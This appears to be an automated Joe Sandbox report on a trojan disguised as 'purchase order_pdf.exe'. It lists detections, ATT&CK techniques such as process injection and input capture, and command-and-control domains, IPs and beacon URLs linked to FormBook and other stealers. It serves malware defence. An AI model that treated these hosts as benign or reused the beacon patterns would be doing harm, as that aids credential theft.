Source: Yara match	File source: 00000001.00000002.2065361338.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4110965953.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4111287403.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4114217360.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4112163408.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065096349.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4112133751.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2065764194.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008E6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_008E6596
Source: C:\Users\user\Desktop\purchase order_pdf.exe	Code function: 0_2_008E6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_008E6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
purchase order_pdf.exe	27%	Virustotal		Browse
purchase order_pdf.exe	32%	ReversingLabs	Win32.Trojan.ShellcodeCrypter
purchase order_pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
quixaclienti.com	0%	Virustotal	Browse
411divorce.com	1%	Virustotal	Browse
sgbet777.org	0%	Virustotal	Browse
www.gymroom.online	0%	Virustotal	Browse
yexz60.live	0%	Virustotal	Browse
www.quixaclienti.com	0%	Virustotal	Browse
www.atlpicsstudios.com	0%	Virustotal	Browse
www.bearclaw.bot	0%	Virustotal	Browse
www.411divorce.com	1%	Virustotal	Browse
www.yexz60.live	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.334es.com/8c7z/	0%	Avira URL Cloud	safe
http://www.evoolihubs.shop/fwdd/	0%	Avira URL Cloud	safe
http://www.hectmalt.xyz/9ntw/?MdEl=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.bearclaw.bot/euu6/?MdEl=IRrESbehp9A4c0aqntgU3lFYJOQbp6eRy9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRa4em8B2a8CWrKaBF9FfZt3ygodHmjWNP+HTQ=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.789bet1okvip.solutions/aoam/?MdEl=Eo7hyHn30cp3PMoxDjiBTCLymbRhKoJHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvHAJ+VSdLDx129114BTxIEL4w+Khlyco+cjU=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.334es.com/8c7z/?MdEl=syard6w4RGgVSvsize8tVtoRwRwiqlTl/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVagwsKCpAvqMMVe/9cP8qS2tqU0eEbGFFph0=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.noghteyab.com/wlsq/?MdEl=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.411divorce.com/6rlx/	0%	Avira URL Cloud	safe
http://www.sodnavisystem.com/5mht/	0%	Avira URL Cloud	safe
http://www.mcpcrecycling.com/22y6/?MdEl=ICuY/wpnSFLYWqZeSYP5+XSCIc/V03at4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMc602XFrpJHW0SVUWS6K0hYrp1sZ66M431O8=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.shaf-kupe-msk.store/8rqd/?MdEl=9oZ/y9WNG6tRMVJzvrFJclhZlNWoKEVAmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1ryApRwhJgDSSPIk5FA+fYO+UYOCGL962fYpg=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.atlpicsstudios.com/8td2/	0%	Avira URL Cloud	safe
http://www.411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.sodnavisystem.com/5mht/	0%	Virustotal		Browse
http://www.bearclaw.bot/euu6/	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api.js?hl=en	0%	Avira URL Cloud	safe
http://www.shaf-kupe-msk.store/8rqd/	0%	Avira URL Cloud	safe
http://help.yahoo.com/help/us/ysearch/slurp)	0%	Avira URL Cloud	safe
http://www.atlpicsstudios.com/8td2/	0%	Virustotal		Browse
http://www.quixaclienti.com/ch4t/?MdEl=zV4psITF3VeqDPaqevV/ztXjzJ8EZ83YyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVCw2qyEvOyn2Tbh4jjcvU+JdLP1FjOVd5YU4=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.sodnavisystem.com/5mht/?MdEl=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.gymroom.online/9v4b/?MdEl=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://help.yahoo.com/help/us/ysearch/slurp)	0%	Virustotal		Browse
http://www.hectmalt.xyz/9ntw/	0%	Avira URL Cloud	safe
http://www.yexz60.live/b58q/?MdEl=9y3r5r666D9AuSqfLzxakfc3WeHGC1b3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iIz6r0aAJ1Bk1DmI4olH2PPKy4iCHNw8YI/w=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.bearclaw.bot/euu6/	0%	Virustotal		Browse
https://www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P	0%	Avira URL Cloud	safe
http://www.hectmalt.xyz/9ntw/	1%	Virustotal		Browse
https://www.google.com/recaptcha/api.js?hl=en	0%	Virustotal		Browse
http://www.gymroom.online/9v4b/	0%	Avira URL Cloud	safe
https://301mei.xyz:7788/?u=	0%	Avira URL Cloud	safe
http://www.atlpicsstudios.com/8td2/?MdEl=R87owMDlv/gPXB+jmY4JjL2CfI0KtI8HCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZhlr63e+mCtJkAAC9Y39qRPS5qcaVUFFhd2AY=&cv4D=Bv0xSH88iTF48zS0	0%	Avira URL Cloud	safe
http://www.mcpcrecycling.com/22y6/	0%	Avira URL Cloud	safe
http://411divorce.com/6rlx/?MdEl=Q2ZAF	0%	Avira URL Cloud	safe
http://www.gymroom.online/9v4b/	0%	Virustotal		Browse
http://www.quixaclienti.com/ch4t/	0%	Avira URL Cloud	safe
http://www.789bet1okvip.solutions/aoam/	0%	Avira URL Cloud	safe
http://www.sgbet777.org/aiec/	0%	Avira URL Cloud	safe
http://www.sgbet777.org	0%	Avira URL Cloud	safe
http://www.noghteyab.com/wlsq/	0%	Avira URL Cloud	safe
http://wordpress.org/extend/plugins/nginx-helper/faq/	0%	Avira URL Cloud	safe
https://301mei.xyz:7788/?u=	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.evoolihubs.shop	188.114.96.3	true	true		unknown
www.shaf-kupe-msk.store	45.130.41.38	true	true		unknown
bearclaw.bot	3.33.130.190	true	true		unknown
mcpcrecycling.com	3.33.130.190	true	true		unknown
www.hectmalt.xyz	203.161.41.207	true	true		unknown
quixaclienti.com	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
789bet1okvip.solutions	3.33.130.190	true	true		unknown
atlpicsstudios.com	3.33.130.190	true	true		unknown
www.noghteyab.com	51.89.93.193	true	true		unknown
411divorce.com	5.78.41.174	true	true	1%, Virustotal, Browse	unknown
sgbet777.org	64.46.102.70	true	false	0%, Virustotal, Browse	unknown
www.gymroom.online	37.9.175.173	true	true	0%, Virustotal, Browse	unknown
yexz60.live	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.sodnavisystem.com	162.43.94.40	true	true		unknown
www.334es.com	103.176.91.154	true	true		unknown
www.quixaclienti.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.411divorce.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.yexz60.live	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.sgbet777.org	unknown	unknown	true		unknown
www.atlpicsstudios.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.mcpcrecycling.com	unknown	unknown	true		unknown
www.789bet1okvip.solutions	unknown	unknown	true		unknown
www.bearclaw.bot	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.hectmalt.xyz/9ntw/?MdEl=DF4c4jTIr0uCfSFFw8k7okOaWiqusMuq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUX+A+cKpzBpqYQsgpzguPUBB/nrPxtt52Xac=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.evoolihubs.shop/fwdd/	true	Avira URL Cloud: safe	unknown
http://www.334es.com/8c7z/	true	Avira URL Cloud: safe	unknown
http://www.789bet1okvip.solutions/aoam/?MdEl=Eo7hyHn30cp3PMoxDjiBTCLymbRhKoJHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvHAJ+VSdLDx129114BTxIEL4w+Khlyco+cjU=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.bearclaw.bot/euu6/?MdEl=IRrESbehp9A4c0aqntgU3lFYJOQbp6eRy9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRa4em8B2a8CWrKaBF9FfZt3ygodHmjWNP+HTQ=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.334es.com/8c7z/?MdEl=syard6w4RGgVSvsize8tVtoRwRwiqlTl/jxvjICFtXZ5U2MHVtZOvzhwKMvYk5ST+x5PcETglnXKzlqM+qQVagwsKCpAvqMMVe/9cP8qS2tqU0eEbGFFph0=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.noghteyab.com/wlsq/?MdEl=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.411divorce.com/6rlx/	true	Avira URL Cloud: safe	unknown
http://www.sodnavisystem.com/5mht/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mcpcrecycling.com/22y6/?MdEl=ICuY/wpnSFLYWqZeSYP5+XSCIc/V03at4BwQQiH2zV3f9F/XRNyagXQgakBjN0QcNA+3ga87AEREzxLt9aLMc602XFrpJHW0SVUWS6K0hYrp1sZ66M431O8=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.shaf-kupe-msk.store/8rqd/?MdEl=9oZ/y9WNG6tRMVJzvrFJclhZlNWoKEVAmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1ryApRwhJgDSSPIk5FA+fYO+UYOCGL962fYpg=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.atlpicsstudios.com/8td2/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.bearclaw.bot/euu6/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.shaf-kupe-msk.store/8rqd/	true	Avira URL Cloud: safe	unknown
http://www.quixaclienti.com/ch4t/?MdEl=zV4psITF3VeqDPaqevV/ztXjzJ8EZ83YyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVCw2qyEvOyn2Tbh4jjcvU+JdLP1FjOVd5YU4=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.sodnavisystem.com/5mht/?MdEl=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.gymroom.online/9v4b/?MdEl=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.hectmalt.xyz/9ntw/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.yexz60.live/b58q/?MdEl=9y3r5r666D9AuSqfLzxakfc3WeHGC1b3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iIz6r0aAJ1Bk1DmI4olH2PPKy4iCHNw8YI/w=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.gymroom.online/9v4b/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.atlpicsstudios.com/8td2/?MdEl=R87owMDlv/gPXB+jmY4JjL2CfI0KtI8HCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZhlr63e+mCtJkAAC9Y39qRPS5qcaVUFFhd2AY=&cv4D=Bv0xSH88iTF48zS0	true	Avira URL Cloud: safe	unknown
http://www.mcpcrecycling.com/22y6/	true	Avira URL Cloud: safe	unknown
http://www.quixaclienti.com/ch4t/	true	Avira URL Cloud: safe	unknown
http://www.789bet1okvip.solutions/aoam/	true	Avira URL Cloud: safe	unknown
http://www.sgbet777.org/aiec/	false	Avira URL Cloud: safe	unknown
http://www.noghteyab.com/wlsq/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/api.js?hl=en	isoburn.exe, 00000006.00000002.4112853127.00000000062E0000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004170000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://help.yahoo.com/help/us/ysearch/slurp)	firefox.exe, 00000009.00000002.2352034593.000002F3EFD97000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P	isoburn.exe, 00000006.00000002.4112853127.0000000006604000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004494000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://301mei.xyz:7788/?u=	isoburn.exe, 00000006.00000002.4114710571.0000000007EC0000.00000004.00000800.00020000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004ADC000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://411divorce.com/6rlx/?MdEl=Q2ZAF	isoburn.exe, 00000006.00000002.4112853127.0000000006DDE000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004C6E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	isoburn.exe, 00000006.00000002.4114961080.000000000816E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sgbet777.org	PIrlNRZFMoz.exe, 00000008.00000002.4114217360.00000000058AD000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wordpress.org/extend/plugins/nginx-helper/faq/	isoburn.exe, 00000006.00000002.4112853127.0000000006DDE000.00000004.10000000.00040000.00000000.sdmp, PIrlNRZFMoz.exe, 00000008.00000002.4112451210.0000000004C6E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
51.89.93.193	www.noghteyab.com	France	16276	OVHFR	true
5.78.41.174	411divorce.com	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	true
162.43.94.40	www.sodnavisystem.com	United States	11333	CYBERTRAILSUS	true
188.114.96.3	www.evoolihubs.shop	European Union	13335	CLOUDFLARENETUS	true
37.9.175.173	www.gymroom.online	Slovakia (SLOVAK Republic)	51013	WEBSUPPORT-SRO-SK-ASSK	true
203.161.41.207	www.hectmalt.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
45.130.41.38	www.shaf-kupe-msk.store	Russian Federation	198610	BEGET-ASRU	true
3.33.130.190	bearclaw.bot	United States	8987	AMAZONEXPANSIONGB	true
64.46.102.70	sgbet777.org	United States	26163	DATAGRAMUS	false
103.176.91.154	www.334es.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1468882
Start date and time:	2024-07-08 07:18:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	purchase order_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@15/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 91% Number of executed functions: 61 Number of non-executed functions: 265
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:20:10	API Interceptor	10253368x Sleep call for process: isoburn.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51.89.93.193	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.noghteyab.com/wlsq/?CbPtaF=9G9JaQreu1q7pVWcrNT/fRK1XJwicXYdEWH52d0+9tQM8/+noicIREkWd/c/vCZ1acCjjeuAo42rGPHTfjnYjXAhd6PdeSH1Fptpw/53o/FvY9kFKM2jhZI=&NV=CzkTp6UpmNmd
162.43.94.40	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.sodnavisystem.com/5mht/?CbPtaF=Z08L+geXOaCZa14tX+Dce5rz8Tb3SFKzhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWLTcISJV/mUGk7GPA31V4F2pYJx4Wp0unWNc=&NV=CzkTp6UpmNmd
188.114.96.3	475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	651186lm.nyashmyash.top/pipeRequestSecurePacketlowbigloaddefaultTempUploadsTemporary.php
	4LPk0o7T6C.exe	Get hash	malicious	FormBook	Browse	www.mainz-cruise-deals.today/rn94/?CZbDp=fTeDovxhSZ2T70J&2ds=09eGDPUJepCFUU6E4tGoUe5x4dgTJ3zXonwB9AX7AS4ixaR6NbPwPSgI2hlgq7bEBXzd
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	auth.xn--conbase-sfb.xyz/api.php?{B955B2CC07A01546086603}
	Kxjf9xfVcb.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	911628cm.nyashka.top/imagevideopipehttpLowgameBigloadmultidleLocal.php
	327vRde1h3nsEEG.exe	Get hash	malicious	FormBook	Browse	www.gemaroke2.shop/mc10/?qR-LsrxH=cH0r006G1k9BH3Prdi0o8oeF8aabeeFKkLVVuPEC0gCNiYJWCEK9irK+mrJ5aktgxtn1&TVm0xb=yj88DTHplR0
	http://www.telegramkv.com/	Get hash	malicious	Unknown	Browse	www.telegramkv.com/
	Scan405.exe	Get hash	malicious	FormBook	Browse	www.jjjw.xyz/ypml/
	AuT5pFGTFw.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/efdt/
	http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/	Get hash	malicious	HTMLPhisher	Browse	business.ifbsmetaiidentiityconfirms.com/favicon.ico
	BL Draft.exe	Get hash	malicious	FormBook	Browse	www.ediancai.cn/x7r2/
